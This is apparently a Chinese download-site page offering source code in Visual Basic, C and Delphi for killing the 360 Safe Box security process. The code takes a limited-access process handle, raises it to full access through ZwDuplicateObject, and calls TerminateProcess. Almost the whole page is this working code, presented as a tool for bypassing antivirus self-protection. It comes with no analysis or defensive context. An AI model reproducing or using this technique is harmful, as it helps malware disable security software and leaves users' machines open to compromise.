再次干掉360保险箱 VB/VC/delphi 源码 -电脑资料

    Option Explicit

    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

    Private Declare Function ZwDuplicateObject _

    Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _

    ByVal SourceHandle As Long, _

    ByVal TargetProcessHandle As Long, _

    ByRef TargetHandle As Long, _

    ByVal DesiredAccess As Long, _

    ByVal HandleAttributes As Long, _

    ByVal Options As Long) As Long

    Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long

    Function FcOpenProcess&(p&)

    Dim ProcessHandle As Long

    Dim Rtn As Long

    ProcessHandle = OpenProcess(&H400, 0, p)

    If ProcessHandle <> 0 Then

    Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1)

    FcOpenProcess = ProcessHandle

    End If

    End Function

    Private Sub Command1_Click()

    Dim ProcessHandle As Long

    ProcessHandle = FcOpenProcess&(1884)

    TerminateProcess ProcessHandle, 0

    End Sub

    ///////////////////////

    void KillProcess (ULONG dwProcessId)

    {

    HMODULE hNTDLL = GetModuleHandle("ntdll.dll");

    HANDLE  hProcessHandle;

    _ZwDuplicateObject ZwDuplicateObject =

    (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject");

    //打开进程权限要为0x400

    hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId);

    if(hProcessHandle != NULL)

    {

    //复制句柄

    ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1);

    }

    TerminateProcess(hProcessHandle, 0);

    }

    //////////////////////////////////////

    既然VB VC 都有了  也就不差  delphi的了

    /////////////////////

    附上D源码

    /////////////////////

    function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’;

    Function FcOpenProcess(p:Longint):Longint;

    var

    Rtn,ProcessHandle:Longint;

    begin

    ProcessHandle := OpenProcess($400, False, p);

    result:=0;

    If ProcessHandle <> 0 Then

    begin

    Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1);

    result := ProcessHandle

    End;

    End;

    procedure TForm1.Button1Click(Sender: TObject);

    var

    ProcessHandle :Longint;

    begin

    ProcessHandle := FcOpenProcess(3440);

    TerminateProcess( ProcessHandle, 0 );

    end;